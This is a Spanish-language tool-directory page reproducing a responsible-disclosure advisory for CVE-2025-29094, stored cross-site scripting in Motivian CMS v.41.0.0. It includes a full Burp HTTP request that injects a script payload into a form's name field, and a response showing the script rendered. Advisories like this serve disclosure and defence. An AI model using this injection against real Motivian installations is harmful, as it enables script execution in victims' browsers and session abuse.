Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-29094-Multiple-Stored-Cross-Site-Scripting-XSS — Este repositorio revela una vulnerabilidad de seguridad descubierta en Motivian Content Management System v.41.0.0. | Kitploit
Herramientas/GitHubGitHub/framarcuccio/cve-2025-29094-multiple-stored-cross-site-scripting-xss
Análisis de VulnerabilidadesExplotaciónRecopilación de InformaciónSeguridad WebPruebas de PenetraciónAprendizaje y Educación
GitHubframarcuccio/cve-2025-29094-multiple-stored-cross-site-scripting-xss

CVE-2025-29094-Multiple-Stored-Cross-Site-Scripting-XSS

Este repositorio revela una vulnerabilidad de seguridad descubierta en Motivian Content Management System v.41.0.0.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 6 mesesAún no revisado

CVE-2025-29094-Multiple-Stored-Cross-Site-Scripting-XSS

Este repositorio revela una vulnerabilidad de seguridad descubierta en Motivian Content Management System v.41.0.0.

  • CVE-2025-29094: Múltiples Cross-Site Scripting (XSS) Almacenados

Esta vulnerabilidad fue reportada al proveedor de acuerdo con las prácticas de divulgación responsable, y a MITRE, que asignó un ID de CVE temporal. Los detalles se están haciendo públicos tras la expiración del período de divulgación de 45 días.

Información General

  • Título: Cross-Site Scripting (XSS) Almacenado en Motivian
  • Tipo de vulnerabilidad: XSS almacenado
  • Proveedor del producto: Motivian
  • Producto: Motivian Content Management System
  • Versión afectada: Motivian CMS v.41.0.0
  • Componentes afectados: Marketing/Forms, Marketing/Offers, Content/Pages
  • Vector de ataque: Remoto
  • Impacto: Ejecución arbitraria de JavaScript en el navegador de la víctima
  • Severidad: Alta
  • Puntuación CVSSv3: 7.6
  • Vector CVSSv3: CVSS:3.1:AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N
  • Severidad según CISA-ADP: Media
  • Puntuación CVSSv3 según CISA-ADP: 6.1
  • Vector CVSSv3 según CISA-ADP: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
  • Descubierta: 2025-01-29
  • Por: Francesco Marcuccio
  • Estado: Reportada al proveedor el 7 de abril de 2025 - Sin respuesta/corrección recibida al 22 de mayo de 2025

Descripción

Una vulnerabilidad de Cross-Site Scripting en Motivian Content Mangment System v.41.0.0 permite a un atacante remoto ejecutar código arbitrario a través de los componentes Marketing/Forms, Marketing/Offers y Content/Pages. La vulnerabilidad fue explotada inyectando código JavaScript malicioso en varios campos, incluido el título en Marketing/Form y Marketing/Offers, y el campo header script en Content/Pages.

Prueba de Concepto

La vulnerabilidad puede explotarse a través de varios campos en diferentes componentes. Con fines de demostración, la siguiente prueba de concepto se centra en un escenario específico:

  1. Navegue a la sección Marketing/Forms y cree un nuevo elemento de formulario.
  2. Inserte un script malicioso en el campo Name y guarde el formulario.

A continuación se muestra la transcripción completa de las solicitudes y respuestas HTTP utilizadas para demostrar el problema:

Solicitud de Burp

root@kitploit:~
POST /portal/admin/formbuilder/editCmsFormProps!saveForm.action HTTP/1.1
Host: [REDACTED]
Content-Length: 1362
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close

targetFieldId=&targetFormId=&targetFieldIndex=&openedTabProps=tab1&langSelected=it&form.id=1162&search_form_id=&search_form_status_id=&search_form_name=&search_form_description=&date_from=&date_to=&currentPage=&struts.token.name=EditCmsFormProps&EditCmsFormProps=DBFW4RH1O9SVF1J3J9TA0WSD5VHPJCKY&date_notification=&form.seoName_en=&form.seoName_el=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&[...]

Respuesta de Burp

root@kitploit:~
HTTP/1.1 200 OK
Connection: close
Date: Wed, 05 Feb 2025 12:00:09 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: it-IT
Content-Length: 94593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>MOTIVIAN | Content Management</title> <link rel="shortcut icon" type="image/x-icon" href="/portal/favicon.ico"/> <link rel="icon" type="image/x-icon" href="/portal/favicon.ico"/> <script> <a href="javascript:void(0)" class="sortingRow" onclick="javascript:simplePagesFormDoSort('status','asc')" >Status</a></td> <td class="TableHeader" colspan="9" style="width:188px">Management</td> <td class="TableHeader w10">&nbsp;</td> </tr> </table> </td> </tr> <tr> <td class="w10 row_odd">&nbsp;</td> <td class="w70 row_odd"> <div class="check-box w70" style="float:left"> <input type="checkbox" id="subpages_formIds_id_1162" name="formIds" value="1162"> <label for="subpages_formIds_id_1162">1162 </label> </div> </td> <td class="w40 row_odd"><img src="https://raw.githubusercontent.com/framarcuccio/cve-2025-29094-multiple-stored-cross-site-scripting-xss/HEAD/portal/assets/images/red_form.png"/></td> <td class="NameCol row_odd"> <div class="wrap_words_within_rows w155"><script>alert(document.domain)</script> [...]

Remediación

Sanitice toda entrada de usuario y escape la salida antes de renderizarla. Implemente la cabecera CSP (Content Security Policy) para mitigar los riesgos de XSS.

Cronología de Divulgación

FechaAcción
2025-02-06Solicitud de ID de CVE (CNA: MITRE)

Créditos

  • Descubierta y divulgada de forma responsable por:
    Francesco Marcuccio
    Consultor de Ciberseguridad, Penetration Tester

  • Atribución del descubridor en MITRE listada como:
    Francesco Marcuccio
    Consultor de Ciberseguridad, Penetration Tester

Enlaces

Enlaces de referencia: MITRE NIST

Estado

Este ID de CVE se encuentra oficialmente en estado PUBLISHED. Será actualizado con la puntuación CVSS por NIST, tras el análisis.

Descargar herramienta
2025-04-02Asignación del ID de CVE
2025-04-07Vulnerabilidades reportadas al proveedor
2025-05-31Divulgación pública tras la expiración del período de divulgación de 45 días (54 días en total)
2025-06-04Registro oficial e ingreso en la base de datos de MITRE y en el portal NIST/NVD